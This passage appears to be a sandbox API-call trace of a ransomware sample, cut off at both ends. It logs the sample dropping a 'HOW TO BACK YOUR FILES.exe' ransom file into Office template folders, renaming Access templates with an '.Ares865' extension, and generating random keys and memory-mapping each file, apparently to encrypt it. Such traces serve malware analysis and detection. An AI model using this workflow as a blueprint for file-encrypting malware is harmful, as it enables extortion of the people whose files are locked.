lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.682] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX" [0062.682] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX" [0062.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3aa710, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56de0800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56de0800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.690] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.690] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.690] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access" [0062.690] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access" [0062.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.698] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.698] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56e06960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56e06960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.698] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.698] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.698] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.Ares865") returned 76 [0062.698] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt.ares865"), dwFlags=0x1) returned 1 [0062.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.700] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1036366) returned 1 [0062.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.701] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.702] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.702] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfd350, lpName=0x0) returned 0x118 [0062.707] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd350) returned 0x2ad0000 [0062.857] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.873] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt.Ares865") returned 94 [0062.874] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt.ares865"), dwFlags=0x1) returned 1 [0062.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.874] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1766397) returned 1 [0062.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0062.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.878] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.879] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.879] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1af700, lpName=0x0) returned 0x118 [0062.880] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1af700) returned 0x3650000 [0062.951] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.976] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt.Ares865") returned 78 [0062.976] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt.ares865"), dwFlags=0x1) returned 1 [0062.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.979] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=869804) returned 1 [0062.979] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0062.979] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.979] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.979] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.980] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd48b0, lpName=0x0) returned 0x118 [0062.982] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd48b0) returned 0x2ad0000 [0063.045] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0063.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0063.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.058] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt.Ares865") returned 76 [0063.058] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\events.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\events.accdt.ares865"), dwFlags=0x1) returned 1 [0063.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\events.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0063.061] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=193199) returned 1 [0063.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0063.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0063.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0063.062] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0063.062] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0063.062] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.063] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2f5b0, lpName=0x0) returned 0x118 [0063.064] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f5b0) returned 0x420000 [0063.071] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0063.072] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0063.072] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.075] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt.Ares865") returned 77 [0063.075] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\faculty.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\faculty.accdt.ares865"), dwFlags=0x1) returned 1 [0063.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\faculty.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0063.076] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=477451) returned 1 [0063.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0063.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0063.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0063.077] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0063.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0063.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.077] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c10, lpName=0x0) returned 0x118 [0063.079] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74c10) returned 0x420000 [0063.097] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0063.098] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0063.098] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.105] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt.Ares865") returned 76 [0063.105] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt.ares865"), dwFlags=0x1) returned 1 [0063.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0063.106] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=528200) returned 1 [0063.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0063.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0063.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0063.107] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0063.107] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0063.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.108] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x81250, lpName=0x0) returned 0x118 [0063.109] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x81250) returned 0x420000 [0063.130] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0063.130] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0063.130] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.138] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt.Ares865") returned 88 [0063.138] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt.ares865"), dwFlags=0x1) returned 1 [0063.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0063.139] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1107436) returned 1 [0063.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0063.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0063.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0063.139] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0063.140] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0063.140] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.140] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e8f0, lpName=0x0) returned 0x118 [0063.142] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10e8f0) returned 0x3650000 [0063.193] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0063.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0063.201] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.236] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt.Ares865") returned 79 [0063.236] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt.ares865"), dwFlags=0x1) returned 1 [0063.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0063.246] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2054738) returned 1 [0063.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0063.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0063.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0063.246] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0063.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0063.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.247] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f5d60, lpName=0x0) returned 0x118 [0063.248] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f5d60) returned 0x3650000 [0064.046] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.047] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.047] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.077] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt.Ares865") returned 78 [0064.077] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\projects.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\projects.accdt.ares865"), dwFlags=0x1) returned 1 [0064.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\projects.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.080] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1428600) returned 1 [0064.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0064.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0064.081] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0064.081] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.081] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.081] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15cf80, lpName=0x0) returned 0x118 